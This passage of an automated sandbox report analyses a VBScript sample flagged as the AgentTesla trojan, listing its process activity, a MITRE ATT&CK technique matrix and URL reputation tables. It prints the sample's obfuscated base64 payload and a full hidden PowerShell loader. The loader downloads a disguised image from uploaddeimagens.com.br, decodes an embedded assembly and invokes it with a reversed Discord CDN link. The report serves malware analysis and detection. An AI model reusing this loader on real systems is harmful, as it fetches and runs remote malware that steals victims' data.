'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('&bee0e3e6d1a3438062cea2274c106b5c8af7ca4b988a99cbe8e3c73825db8986=mh&d9ac3366=si&d1c15366=xe?txt.elif/5863426205721465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','addinprocess32',''))} }"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('&bee0e3e6d1a3438062cea2274c106b5c8af7ca4b988a99cbe8e3c73825db8986=mh&d9ac3366=si&d1c15366=xe?txt.elif/5863426205721465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','addinprocess32',''))} }"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information221
          Scripting
          Valid Accounts11
          Command and Scripting Interpreter
          221
          Scripting
          111
          Process Injection
          1
          Masquerading
          OS Credential Dumping11
          Security Software Discovery
          Remote ServicesData from Local System1
          Web Service
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution
          1
          Office Application Startup
          1
          DLL Side-Loading
          121
          Virtualization/Sandbox Evasion
          LSASS Memory1
          Process Discovery
          Remote Desktop ProtocolData from Removable Media1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts3
          PowerShell
          1
          DLL Side-Loading
          Logon Script (Windows)111
          Process Injection
          Security Account Manager121
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive3
          Ingress Tool Transfer
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
          Obfuscated Files or Information
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Software Packing
          LSA Secrets2
          File and Directory Discovery
          SSHKeylogging14
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials12
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          file.vbs29%ReversingLabsScript-WScript.Trojan.AgentTesla
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
          http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://analytics.paste.ee0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          https://aka.ms/pscore680%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://secure.gravatar.com0%URL Reputationsafe
          https://themes.googleusercontent.com0%URL Reputationsafe
          https://paste.ee/d/ZKQQ9U0%Avira URL Cloudsafe
          http://uploaddeimagens.com.br0%Avira URL Cloudsafe
          https://www.google.com;0%Avira URL Cloudsafe
          https://www.google.com0%Avira URL Cloudsafe
          https://cdn.discordapp.com/attachments/1235627023511191643/1235641275026243685/file.txt?ex=66351c1d&is=6633ca9d&hm=6898bd52837c3e8ebc99a889b4ac7fa8c5b601c4722aec2608343a1d6e3e0eeb&0%Avira URL Cloudsafe
          https://paste.ee/d/ZKQQ9ramF0%Avira URL Cloudsafe
          http://app01.system.com.br/RDWeb/Pages/login.aspxd0%Avira URL Cloudsafe
          https://pastcinzal.cinzalcinzal/d/ZKQQ90%Avira URL Cloudsafe
          https://paste.ee/;0%Avira URL Cloudsafe
          https://github.com/Pester/Pester0%Avira URL Cloudsafe
          https://paste.ee/d/ZKQQ90%Avira URL Cloudsafe
          https://uploaddeimagens.com.br0%Avira URL Cloudsafe
          https://paste.ee/d/ZKQQ9m0%Avira URL Cloudsafe
          https://analytics.paste.ee;0%Avira URL Cloudsafe
          https://paste.ee/0%Avira URL Cloudsafe
          https://cdnjs.cloudflare.com0%Avira URL Cloudsafe
          https://paste.ee/d/ZKQQ9/m0%Avira URL Cloudsafe
          https://paste.ee/d/ZKQQ9e0%Avira URL Cloudsafe
          https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
          https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029100%Avira URL Cloudmalware
          http://app01.system.com.br/RDWeb/Pages/login.aspx0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          paste.ee
          188.114.96.3
          truetrue
            unknown
            cdn.discordapp.com
            162.159.130.233
            truefalse
              unknown
              uploaddeimagens.com.br
              188.114.97.3
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                https://cdn.discordapp.com/attachments/1235627023511191643/1235641275026243685/file.txt?ex=66351c1d&is=6633ca9d&hm=6898bd52837c3e8ebc99a889b4ac7fa8c5b601c4722aec2608343a1d6e3e0eeb&false
                • Avira URL Cloud: safe
                unknown
                https://paste.ee/d/ZKQQ9true
                • Avira URL Cloud: safe
                unknown
                https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029true
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000010.00000002.1746262411.000001B010070000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://paste.ee/d/ZKQQ9Uwscript.exe, 00000001.00000003.1421763806.000001FA66BA3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1425621780.000001FA66BA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.1590353299.000001B000223000.00000004.00000800.00020000.00000000.sdmptrue
                • URL Reputation: malware
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.1590353299.000001B000223000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://contoso.com/Licensepowershell.exe, 00000010.00000002.1746262411.000001B010070000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://www.google.com;wscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/Iconpowershell.exe, 00000010.00000002.1746262411.000001B010070000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://paste.ee/;wscript.exe, 00000001.00000002.1425621780.000001FA66B8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1421763806.000001FA66B86000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://analytics.paste.eewscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://uploaddeimagens.com.brpowershell.exe, 00000010.00000002.1590353299.000001B0064ED000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.1590353299.000001B000223000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://paste.ee/d/ZKQQ9ramFwscript.exe, 00000001.00000002.1425621780.000001FA66B8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1421763806.000001FA66B86000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://pastcinzal.cinzalcinzal/d/ZKQQ9wscript.exe, 00000001.00000003.1418152044.000001FA668D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423182787.000001FA64A2D000.00000004.00000020.00020000.00000000.sdmp, file.vbsfalse
                • Avira URL Cloud: safe
                unknown
                http://app01.system.com.br/RDWeb/Pages/login.aspxdwscript.exe, 00000001.00000003.1416337095.000001FA668D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1421534739.000001FA668D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423146490.000001FA668E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1221452637.000001FA668DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1221152356.000001FA668DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1418152044.000001FA668D1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www.google.comwscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://uploaddeimagens.com.brpowershell.exe, 00000010.00000002.1590353299.000001B000223000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://paste.ee/d/ZKQQ9mwscript.exe, 00000001.00000003.1421763806.000001FA66BA3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1425621780.000001FA66BA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/powershell.exe, 00000010.00000002.1746262411.000001B010070000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://nuget.org/nuget.exepowershell.exe, 00000010.00000002.1746262411.000001B010070000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://paste.ee/wscript.exe, 00000001.00000002.1425621780.000001FA66B8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1421763806.000001FA66B86000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://analytics.paste.ee;wscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://paste.ee/d/ZKQQ9ewscript.exe, 00000001.00000003.1422883330.000001FA64A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423182787.000001FA64A47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1424693017.000001FA64A47000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://cdnjs.cloudflare.comwscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://paste.ee/d/ZKQQ9/mwscript.exe, 00000001.00000003.1422142977.000001FA66B71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422952198.000001FA66B79000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422727575.000001FA66B78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1425596311.000001FA66B79000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://aka.ms/pscore68powershell.exe, 0000000E.00000002.1877541465.00000158E1FEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1877541465.00000158E1FD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1590353299.000001B000001000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://cdnjs.cloudflare.com;wscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000E.00000002.1877541465.00000158E1F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1590353299.000001B000001000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://secure.gravatar.comwscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://themes.googleusercontent.comwscript.exe, 00000001.00000002.1424566924.000001FA649C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423395644.000001FA66C15000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
